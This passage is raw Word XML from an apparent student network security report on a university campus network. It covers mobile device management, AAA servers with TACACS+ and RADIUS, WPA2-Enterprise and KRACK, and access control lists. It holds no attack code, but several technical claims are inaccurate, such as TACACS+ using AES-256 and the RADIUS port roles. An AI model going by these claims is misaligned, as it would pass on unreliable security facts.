        <w:t>the Norton security software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> architecture is compatible </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>with the VMware Air-watch MDM application and it is also highly recommended by cybersecurity experts as a complete MDM solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0F5F7" w14:textId="6F15483D" w:rsidR="00974093" w:rsidRDefault="00974093" w:rsidP="00974093">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ‘Air-watch’ </w:t>
      </w:r>
      <w:r w:rsidR="00347236">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MDM solution mitigates the internal malware security threats posed by the BYOD policy that were previously identified in this paper. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD46917" w14:textId="77777777" w:rsidR="00FF1C3F" w:rsidRDefault="00FF1C3F" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526D1F9A" w14:textId="77777777" w:rsidR="008425DD" w:rsidRDefault="00683E0B" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VMware</w:t>
      </w:r>
      <w:r w:rsidR="00A8071A">
        <w:t xml:space="preserve"> Air-watch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8071A">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008425DD">
        <w:t>Norton-Endpoint security</w:t>
      </w:r>
      <w:r w:rsidR="00A8071A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="008D03D8">
        <w:t xml:space="preserve"> both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D03D8">
        <w:t>within the premium top bracket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the most expensive </w:t>
      </w:r>
      <w:r w:rsidR="008425DD">
        <w:t xml:space="preserve">MDM security </w:t>
      </w:r>
      <w:r>
        <w:t>solutions on the market</w:t>
      </w:r>
      <w:r w:rsidR="00275AB8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38129CDE" w14:textId="77777777" w:rsidR="008425DD" w:rsidRDefault="008425DD" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0380C3" w14:textId="22D4764A" w:rsidR="006E794D" w:rsidRDefault="00275AB8" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve"> advent of the </w:t>
      </w:r>
      <w:r w:rsidR="00BB592E">
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidR="00BB592E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the premium price of the MDM </w:t>
      </w:r>
      <w:r w:rsidR="005B41B2">
        <w:t>security application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve"> inexpensive </w:t>
      </w:r>
      <w:r w:rsidR="00252267">
        <w:t>in comparison</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve"> to the fine imposed for a data security breach within Europe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAE082" w14:textId="2B2FD93E" w:rsidR="00911065" w:rsidRPr="00766418" w:rsidRDefault="00911065" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B42F17A" w14:textId="5C43C240" w:rsidR="00AA0348" w:rsidRDefault="00AA0348" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication, Authorisation and Accounting (AAA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E800816" w14:textId="77777777" w:rsidR="00911065" w:rsidRPr="00070ADA" w:rsidRDefault="00911065" w:rsidP="00911065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E970A10" w14:textId="407175EA" w:rsidR="00911065" w:rsidRDefault="002978CA" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AAA is a security software package that </w:t>
      </w:r>
      <w:r w:rsidR="00142F93">
        <w:t>is located within a server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00142F93">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>A AAA</w:t>
      </w:r>
      <w:r w:rsidR="00142F93">
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is most commonly utilised within a LAN to </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t>provide an additional</w:t>
      </w:r>
      <w:r w:rsidR="00B511AE" w:rsidRPr="00B511AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t>layer of security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for accessing</w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">internetworking devices within a LAN </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t>that include;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B18E69" w14:textId="46B12025" w:rsidR="00B511AE" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142B08A8" w14:textId="77A32A13" w:rsidR="00B511AE" w:rsidRPr="002978CA" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B511AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Authentication;</w:t>
      </w:r>
      <w:r w:rsidR="003C454F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002978CA" w:rsidRPr="002978CA">
        <w:t>This process within the AAA server software authenticates usernames and password of administrators and network technicians accessing internetworking devices</w:t>
      </w:r>
      <w:r w:rsidR="0034529C">
        <w:t xml:space="preserve"> locally or remotely</w:t>
      </w:r>
      <w:r w:rsidR="002978CA" w:rsidRPr="002978CA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0826E91D" w14:textId="57C9C012" w:rsidR="00B511AE" w:rsidRPr="00B511AE" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DA57C4" w14:textId="4ED405AE" w:rsidR="00B511AE" w:rsidRPr="00B511AE" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B511AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Authorisation;</w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002978CA" w:rsidRPr="002978CA">
        <w:t xml:space="preserve">This process within the AAA server software assigns an authorisation privilege policy to the user that is accessing an internetworking device that </w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:t xml:space="preserve">assigns </w:t>
      </w:r>
      <w:r w:rsidR="003409DE">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:t xml:space="preserve"> to a user as to</w:t>
      </w:r>
      <w:r w:rsidR="002978CA" w:rsidRPr="002978CA">
        <w:t xml:space="preserve"> what commands</w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:t xml:space="preserve"> they </w:t>
      </w:r>
      <w:r w:rsidR="002978CA" w:rsidRPr="002978CA">
        <w:t>can perform within an internetworking device</w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:t xml:space="preserve"> i.e. </w:t>
      </w:r>
      <w:r w:rsidR="009515A6">
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="002978CA">
        <w:t xml:space="preserve"> Engineer</w:t>
      </w:r>
      <w:r w:rsidR="009515A6">
        <w:t xml:space="preserve"> would have full privilege access because of his/her skill level and job role within a company. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009515A6">
        <w:t>Where as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009515A6">
        <w:t xml:space="preserve"> a less skilled network technician would be restricted to what commands he/she could execute within a device based on their job role and skill level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A4830" w14:textId="17D03DB2" w:rsidR="00B511AE" w:rsidRPr="00B511AE" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADB8AA4" w14:textId="2690366A" w:rsidR="00B511AE" w:rsidRDefault="00B511AE" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B511AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Accounting;</w:t>
      </w:r>
      <w:r w:rsidR="009515A6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009515A6" w:rsidRPr="002978CA">
        <w:t>This process within the AAA server software</w:t>
      </w:r>
      <w:r w:rsidR="009515A6">
        <w:t xml:space="preserve"> logs all user access and activity within an internetworking device. The accounting feature is also utilised within an IPS to log suspicious traffic that violates the IPS traffic policy attempting to enter the network from the WAN that has been dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058453E8" w14:textId="4093A520" w:rsidR="00D71A99" w:rsidRDefault="00D71A99" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B329F27" w14:textId="143BF5B5" w:rsidR="00D71A99" w:rsidRDefault="00D71A99" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>There are two forms of security that is utilised within a AAA server which are;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E2ED9" w14:textId="6BC7FDD1" w:rsidR="00D71A99" w:rsidRPr="00D71A99" w:rsidRDefault="00D71A99" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72612399" w14:textId="63A8A2EA" w:rsidR="00D71A99" w:rsidRDefault="00D71A99" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal Access Controller Access-Control System </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TACACS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>+)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00332700">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00332700">
        <w:t>TACACS+ utilises TCP port 49 for secure communications between the TACACS+ server and the TACACS+ client i.e. internetworking devices (Routers, Switches and Hardware Firewalls) that encrypts each packet being communicated between the client and server with AES-256 to prevent a MitM attack by a malicious actor to steal the username  and password of the internetworking devices</w:t>
      </w:r>
      <w:r w:rsidR="00B26F40">
        <w:t xml:space="preserve"> in order</w:t>
      </w:r>
      <w:r w:rsidR="00332700">
        <w:t xml:space="preserve"> to gain access</w:t>
      </w:r>
      <w:r w:rsidR="00B26F40">
        <w:t xml:space="preserve"> to the devices</w:t>
      </w:r>
      <w:r w:rsidR="00332700">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577EE12B" w14:textId="77777777" w:rsidR="00CB3215" w:rsidRPr="00332700" w:rsidRDefault="00CB3215" w:rsidP="00070ADA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41292CCE" w14:textId="4BD18301" w:rsidR="00CB3215" w:rsidRPr="00CB3215" w:rsidRDefault="00CB3215" w:rsidP="00CB3215">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Authentication Dial-In User Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RADIUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3215">
        <w:t>RADIUS combines authentication and authorisation for user password and privileges</w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t xml:space="preserve"> using the connectionless User </w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t>Datagram Protocol (UDP) for client (port 1812) and server (1813) communications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3215">
        <w:t xml:space="preserve">. The RADIUS security protocol </w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3215">
        <w:t xml:space="preserve">encrypts </w:t>
      </w:r>
      <w:r>
        <w:t>the username and password</w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t xml:space="preserve"> field and not the entire packet like TACACS+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of end users and internetworking devices such as Wireless LAN Controllers and AP</w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t xml:space="preserve">’s. This is faster at authenticating and </w:t>
      </w:r>
      <w:r w:rsidR="00A87BDE">
        <w:t>authorising</w:t>
      </w:r>
      <w:r w:rsidR="00964CDC">
        <w:t xml:space="preserve"> an end user device but less secure </w:t>
      </w:r>
      <w:r w:rsidR="00A87BDE">
        <w:t>than TACACS+. RADIUS is most commonly utilised between an AP and a AAA server for enterprise user authentication and authorisation within a WLAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B7A13" w14:textId="77777777" w:rsidR="00911065" w:rsidRDefault="00911065" w:rsidP="00911065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE3A5EC" w14:textId="6F0355BC" w:rsidR="002F6422" w:rsidRDefault="002F6422" w:rsidP="002F6422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>802.11 WLAN</w:t>
      </w:r>
      <w:r w:rsidR="00D71A99">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> WP</w:t>
      </w:r>
      <w:r w:rsidR="003631D6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-2 Enterprise</w:t>
      </w:r>
      <w:r w:rsidR="00D71A99">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF8B7F" w14:textId="3F9BABA8" w:rsidR="002F6422" w:rsidRPr="00A87BDE" w:rsidRDefault="002F6422" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1901D8D2" w14:textId="77777777" w:rsidR="00230B5A" w:rsidRPr="00230B5A" w:rsidRDefault="00230B5A" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52153441" w14:textId="62B6D6B0" w:rsidR="00A87BDE" w:rsidRDefault="003631D6" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230B5A">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Wireless Protected Access 2</w:t>
      </w:r>
      <w:r w:rsidR="00230B5A" w:rsidRPr="00230B5A">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WPA-2)</w:t>
      </w:r>
      <w:r w:rsidR="00230B5A">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a wireless encryption standard that utilises AES-256 for secure encryption between the </w:t>
      </w:r>
      <w:r w:rsidR="00DC7067">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wireless end device and the AP to prevent a MitM attack, WPA-2 was recently exploited by utilising an attack called</w:t>
      </w:r>
      <w:r w:rsidR="00DC7067" w:rsidRPr="00DC7067">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC7067" w:rsidRPr="00DC7067">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Key Reinstallation Attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DC7067">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (KRACK) that exploited insecure firmware. Since the discovery of the exploit AP hardware vendors have patched the firmware within their devices although unpatched devices are still vulnerable if not updated by the network engineer within a network. WPA-2 Enterprise utilises RADIUS for additional security of authentication and authorisation of end devices within an enterprise network and WPA-2 to encrypt each packet transmitted to and from the AP as previously discussed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56FCF3" w14:textId="7332B60A" w:rsidR="003B5DD8" w:rsidRDefault="003B5DD8" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7E8D93" w14:textId="547BFC61" w:rsidR="003B5DD8" w:rsidRDefault="003B5DD8" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Within the UWTSD ‘Smart Campus’ LAN WPA-2 Enterprise has been utilised for the most secure 802.15 LAN impl</w:t>
      </w:r>
      <w:r w:rsidR="007E7407">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ementation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E7407">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>utilsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E7407">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> the AAA server and Wireless Lan Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381B9D6" w14:textId="77777777" w:rsidR="00230B5A" w:rsidRPr="00230B5A" w:rsidRDefault="00230B5A" w:rsidP="002F6422">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73004E25" w14:textId="05A406F3" w:rsidR="006A105A" w:rsidRDefault="006A105A" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Access Control Lists</w:t>
      </w:r>
      <w:r w:rsidR="00DC04BD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ACL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05232889" w14:textId="6025632F" w:rsidR="00911065" w:rsidRPr="00320EBA" w:rsidRDefault="00911065" w:rsidP="00911065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C97AB8E" w14:textId="554E291D" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t>An ACL is configured and applied within internetworking devices such as routers and switches, there are two main forms of ACL that can be utilised in many robust ways such as packet entry control within a LAN and/or route map configuration. These ACL’s are called ‘Standard’ and ‘Extended’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C2C81" w14:textId="77777777" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019D1F29" w14:textId="46942B14" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve"> A ‘Standard’ ACL is a logical security configuration script that can be configured to ‘Permit’ or ‘Deny’ certain IP address ranges or single hosts entering a specific interface or communication line i.e. console and/or VTY Lines depending on where they are applied. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D456C6B" w14:textId="77777777" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C120B2" w14:textId="2B5D09A8" w:rsidR="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve">Similarly, to a standard ACL, ‘Extended’ ACL’s are a configuration script that ‘Permits and ‘Deny’s’ various IP address ranges and/or host but has extended functionality such as filtering IP addresses not just in a brute force way but more of a granular configuration where port numbers can be applied to the configuration to prevent or allow certain protocols being utilised by end devices within a network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B484222" w14:textId="77777777" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283AFC2E" w14:textId="77777777" w:rsidR="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t>ACL’s are a fundamental security tool that is utilised within network security engineering that are easy to configure and apply that add an additional layer of security to the network that is not resource intensive but are very efficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FF401" w14:textId="0E1DCC80" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02939ACB" w14:textId="151FEBE6" w:rsidR="00320EBA" w:rsidRPr="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve">Within the UWTSD network, </w:t>
      </w:r>
      <w:r w:rsidR="005A1912" w:rsidRPr="00320EBA">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve"> extended ACL was applied at all of the gateways within the network to ‘deny’ ICMP packets being transmitted through the network from all of the subnets apart from the </w:t>
      </w:r>
      <w:r w:rsidR="005A1912" w:rsidRPr="00320EBA">
        <w:t>administrator’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve"> subnet. This action was taken to prevent network scanning tools such as ‘Nmap’ mapping the network within the information gathering stage of an attack, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00320EBA">
        <w:lastRenderedPageBreak/>
        <w:t>administrator subnet was given permission to perform ICMP pings because ICMP is a vital troubleshooting tool for network engineers that can help locate the issue within a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AFB9C" w14:textId="598904F7" w:rsidR="00320EBA" w:rsidRDefault="00320EBA" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00320EBA">
        <w:t xml:space="preserve">A standard ACL was also applied at the hardware firewalls to prevent all </w:t>
      </w:r>
      <w:r w:rsidR="00AF5DCC">
        <w:t xml:space="preserve">asymmetric </w:t>
      </w:r>
      <w:r w:rsidRPr="00320EBA">
        <w:t>traffic from the outside zones within the DMZ being able to access the internal network, this included the ‘Guest’ 802.11 subnet. This action was taken as redundant measure of security if the firewall iOS violation policy was to fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78905922" w14:textId="54B872A6" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4313298A" w14:textId="4FA53D7C" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009B3763">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t xml:space="preserve">n extended ACL was also configured to </w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t>permit</w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
